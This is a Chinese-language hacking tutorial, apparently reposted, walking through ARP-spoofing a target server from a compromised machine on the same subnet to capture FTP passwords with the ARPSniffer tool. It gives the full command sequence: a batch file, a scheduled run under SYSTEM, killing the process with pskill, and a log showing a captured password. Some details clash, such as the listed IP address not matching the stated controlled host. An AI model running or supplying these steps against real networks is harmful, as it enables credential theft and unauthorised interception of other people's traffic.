假設(shè)想攻擊的主機(jī)IP是:61.139.1.79
同一子網(wǎng)下我們已有權(quán)限的主機(jī)IP是:61.139.1.88并可以3389登陸
第一步:
tracert 61.139.1.1
C:\WIN2000\system32>tracert 61.139.1.1
Tracing route to HACK-4FJ7EARC [61.139.1.1]
over a maximum of 30 hops:
1 <10 ms <10 ms <10 ms HACK-4FJ7EARC [61.139.1.1]
Trace complete.
這就說明了你想攻擊的主機(jī)和你所在的主機(jī)在一個關(guān)網(wǎng)中那么就有可能
進(jìn)行ARPSNIFFER了
第二步:看本機(jī)IP設(shè)置和網(wǎng)卡情況
C:\WIN2000\system32>ipconfig /all
Windows 2000 IP Configuration
Host Name . . . . . . . . . . . . : smscomputer
Primary DNS Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Broadcast
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Intel Fast Ethernet LAN Controller - onboard:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) 8255x Based Network Connection
Physical Address. . . . . . . . . : 00-B0-D0-22-10-C6
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 61.139.1.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 61.139.1.65
DNS Servers . . . . . . . . . . . : 61.139.1.73
說明只有一塊網(wǎng)卡那么在執(zhí)行ARPSNIFFER的時候就可以不要第五個參數(shù)了這個地
方小榕的主頁可沒有說喲,經(jīng)過測試我發(fā)覺如果只有一塊網(wǎng)卡你第五個參數(shù)使用0
的話也只能嗅探到通過自已的數(shù)據(jù)喲.
從上面我們還可以知道網(wǎng)關(guān)是61.139.1.65
第三步:查看本機(jī)時間
C:\WIN2000\system32>net time \\127.0.0.1
\\127.0.0.1 的當(dāng)前時間是 2003/1/28 下午 09:13
命令完成成功
要注意的是這兒的時間是12小時式,用at命令應(yīng)要24小時式
第四步:編寫啟動ARPsniffer的bat文件
C:\WIN2000\system32>echo arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset>c:\winnt\a.bat
注意咯我們沒有要第五個參數(shù),如果有多個網(wǎng)卡的話你就要先直接執(zhí)行arpsniffer顯示如下:
ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB
www.netXeyes.com 2002, security@vip.sina.com
Network Adapter 0: D-Link DE-528 Ethernet PCI Adapter
Network Adapter 1: Intel(R) PRO/100+ PCI Adapter(這個地方選第五個參數(shù))
Usage: ArpSniffer [/RESET]
第五步:后臺運行開始嗅探咯
C:\winnt\system32>at \\127.0.0.1 20:44 c:\winnt\a.bat
注意:這兒的時間要用24小時式
arpsniffer最好拷到system32目錄下,記錄文件也會生成在這兒
執(zhí)行完第四步要先安裝WINPCAP 2.1驅(qū)動
同時arpsniffer要使用最新的0.5版,老版本有不少BUG而且要改注冊表重啟機(jī)子
第六步:看密碼但是生成的記錄文件不能直接看也不能拷貝所以我們只能先結(jié)束掉
以SYSTEM權(quán)限啟動的ARPSniffer程序
C:\winnt\system32>pulist
...................
conime.exe 248 NT AUTHORITY\SYSTEM
explorer.exe 1864 SMSCOMPUTER\Administrator
CSRSS.EXE 2256 NT AUTHORITY\SYSTEM
Arpsniffer.exe 2322 NT AUTHORITY\SYSTEM ----就是它了!
WINLOGON.EXE 2344 NT AUTHORITY\SYSTEM
......................
殺了它
C:\winnt\system32>pskill 2322
PsKill v1.03 - local and remote process killer
Copyright (C) 2000 Mark Russinovich
http://www.sysinternals.com
Process 2322 killed.
C:\winnt\system32>type 1.txt 我的例子中嗅探的是FTP密碼:)
...............
61.188.218.179(1404)->61.139.1.79(21)PASS aaabbb
61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.
61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.
61.188.218.179(1404)->61.139.1.79(21)QUIT
61.188.218.179(1404)->61.139.1.79(21)QUIT
61.139.1.79(21)->61.188.218.179(1404)221
61.139.1.79(21)->61.188.218.179(1404)221
............
............
特別要注意的就是PASS哈:)
----------------------------------------------------
付錄:
前臺正常執(zhí)行的顯示
C:\>arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset
ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB
www.netXeyes.com 2002, security@vip.sina.com
Network Adapter 0: Intel(R) 8255x Based Network Connection
Enable IP Router....OK
Get 61.139.1.65 Hardware Address: 00-00-0c-07-ac-02
Get 61.139.1.79 Hardware Address: 00-b0-d0-22-10-cb
Get 61.139.1.88 Hardware Address: 00-b0-d0-22-10-c6
Spoof 61.139.1.79: Mac of 61.139.1.65 ===> Mac of 61.139.1.88
Spoof 61.139.1.65: Mac of 61.139.1.79 ===> Mac of 61.139.1.88
有時這兒要先顯示can not open driver(0)不管它等一下就可以了
Begin Sniffer.........
本站僅提供存儲服務(wù),所有內(nèi)容均由用戶發(fā)布,如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請
點擊舉報。